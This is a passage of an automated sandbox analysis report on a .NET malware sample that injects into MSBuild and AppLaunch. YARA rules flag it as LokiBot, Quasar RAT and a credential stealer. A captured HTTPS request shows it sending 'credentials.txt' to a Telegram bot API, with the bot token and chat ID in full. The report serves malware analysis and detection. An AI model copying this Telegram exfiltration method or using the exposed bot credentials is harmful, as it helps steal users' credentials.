                Aug 5, 2022 09:07:16.813250065 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813328981 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.872626066 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.872857094 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:24.632554054 CEST49735443192.168.2.340.126.31.4
                Aug 5, 2022 09:07:24.632603884 CEST4434973540.126.31.4192.168.2.3
                Aug 5, 2022 09:07:24.632816076 CEST49735443192.168.2.340.126.31.4
                Aug 5, 2022 09:07:24.633930922 CEST49735443192.168.2.340.126.31.4
                Aug 5, 2022 09:07:24.633945942 CEST4434973540.126.31.4192.168.2.3
                Aug 5, 2022 09:07:27.157124996 CEST4967380192.168.2.393.184.220.29
                Aug 5, 2022 09:07:27.157316923 CEST4967280192.168.2.3173.222.108.210
                Aug 5, 2022 09:07:27.467627048 CEST4967280192.168.2.3173.222.108.210
                Aug 5, 2022 09:07:27.608279943 CEST4967380192.168.2.393.184.220.29
                Aug 5, 2022 09:07:28.170880079 CEST4967280192.168.2.3173.222.108.210
                Aug 5, 2022 09:07:28.311516047 CEST4967380192.168.2.393.184.220.29
                Aug 5, 2022 09:07:29.467875957 CEST4967280192.168.2.3173.222.108.210
                Aug 5, 2022 09:07:29.608556032 CEST4967380192.168.2.393.184.220.29
                Aug 5, 2022 09:07:31.874250889 CEST4967280192.168.2.3173.222.108.210
                Aug 5, 2022 09:07:32.108644962 CEST4967380192.168.2.393.184.220.29
                Aug 5, 2022 09:07:36.765311956 CEST4967280192.168.2.3173.222.108.210
                Aug 5, 2022 09:07:37.004714966 CEST4967380192.168.2.393.184.220.29
                Aug 5, 2022 09:07:46.469278097 CEST4967280192.168.2.3173.222.108.210
                Aug 5, 2022 09:07:46.609872103 CEST4967380192.168.2.393.184.220.29
                Aug 5, 2022 09:07:54.510822058 CEST49735443192.168.2.340.126.31.4
                Aug 5, 2022 09:07:58.481832027 CEST49744443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:58.481836081 CEST49745443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:58.481899977 CEST44349744204.79.197.200192.168.2.3
                Aug 5, 2022 09:07:58.481914043 CEST44349745204.79.197.200192.168.2.3
                Aug 5, 2022 09:07:58.481995106 CEST49744443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:58.482048035 CEST49745443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:59.060619116 CEST49744443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:59.060651064 CEST44349744204.79.197.200192.168.2.3
                Aug 5, 2022 09:07:59.068233013 CEST49745443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:59.068267107 CEST44349745204.79.197.200192.168.2.3
                Aug 5, 2022 09:07:59.123209953 CEST44349744204.79.197.200192.168.2.3
                Aug 5, 2022 09:07:59.123327017 CEST49744443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:59.124126911 CEST44349744204.79.197.200192.168.2.3
                Aug 5, 2022 09:07:59.124188900 CEST49744443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:59.126110077 CEST44349745204.79.197.200192.168.2.3
                Aug 5, 2022 09:07:59.126240969 CEST49745443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:59.127290010 CEST44349745204.79.197.200192.168.2.3
                Aug 5, 2022 09:07:59.127394915 CEST49745443192.168.2.3204.79.197.200
                Aug 5, 2022 09:07:59.763642073 CEST49744443192.168.2.3204.79.197.200

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 5, 2022 09:08:35.228647947 CEST5811653192.168.2.38.8.8.8
                Aug 5, 2022 09:08:35.247535944 CEST53581168.8.8.8192.168.2.3

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Aug 5, 2022 09:08:35.228647947 CEST192.168.2.38.8.8.80x46e6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Aug 5, 2022 09:07:54.819008112 CEST8.8.8.8192.168.2.30x5059No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                Aug 5, 2022 09:07:58.240801096 CEST8.8.8.8192.168.2.30xb3b6No error (0)www-bing-com.dual-a-0001.a-msedge.netdual-a-0001.a-msedge.netCNAME (Canonical name)IN (0x0001)
                Aug 5, 2022 09:07:58.240801096 CEST8.8.8.8192.168.2.30xb3b6No error (0)dual-a-0001.a-msedge.net204.79.197.200A (IP address)IN (0x0001)
                Aug 5, 2022 09:07:58.240801096 CEST8.8.8.8192.168.2.30xb3b6No error (0)dual-a-0001.a-msedge.net13.107.21.200A (IP address)IN (0x0001)
                Aug 5, 2022 09:08:04.870759964 CEST8.8.8.8192.168.2.30x59bNo error (0)windowsupdatebg.s.llnwi.net95.140.236.128A (IP address)IN (0x0001)
                Aug 5, 2022 09:08:35.247535944 CEST8.8.8.8192.168.2.30x46e6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • api.telegram.org

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.349751149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 07:08:35 UTC0OUTPOST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 201
                Connection: Keep-Alive
                Cache-Control: no-cache
                2022-08-05 07:08:35 UTC0OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 65 64 65 6e 74 69 61 6c 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 2d 2d
                Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="credentials.txt"Content-Type: application/octet-stream--3fbd04f5-b1ed-4060-99b9-fca7ff59c113--
                2022-08-05 07:08:36 UTC0INHTTP/1.1 400 Bad Request
                Server: nginx/1.18.0
                Date: Fri, 05 Aug 2022 07:08:35 GMT
                Content-Type: application/json
                Content-Length: 81
                Connection: close
                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                Access-Control-Allow-Origin: *
                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                2022-08-05 07:08:36 UTC1INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 66 69 6c 65 20 6d 75 73 74 20 62 65 20 6e 6f 6e 2d 65 6d 70 74 79 22 7d
                Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: file must be non-empty"}


                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:09:07:20
                Start date:05/08/2022
                Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"
                Imagebase:0xf10000
                File size:2457088 bytes
                MD5 hash:7278F8490937CAB29D3DD5BC75CB52AB
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.408533446.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                Reputation:low

                General

                Target ID:13
                Start time:09:08:00
                Start date:05/08/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Imagebase:0x7ff73c930000
                File size:261728 bytes
                MD5 hash:D621FD77BD585874F9686D3A76462EF1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:14
                Start time:09:08:01
                Start date:05/08/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Imagebase:0x8c0000
                File size:261728 bytes
                MD5 hash:D621FD77BD585874F9686D3A76462EF1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Reputation:high

                General

                Target ID:16
                Start time:09:08:08
                Start date:05/08/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                Imagebase:0xb80000
                File size:98912 bytes
                MD5 hash:6807F903AC06FF7E1670181378690B22
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: HKTL_NET_GUID_SharpScribbles, Description: Detects .NET red/black-team tools via typelibguid, Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_ThunderFoxStealer, Description: Yara detected ThunderFox Stealer, Source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high

                Disassembly

                No disassembly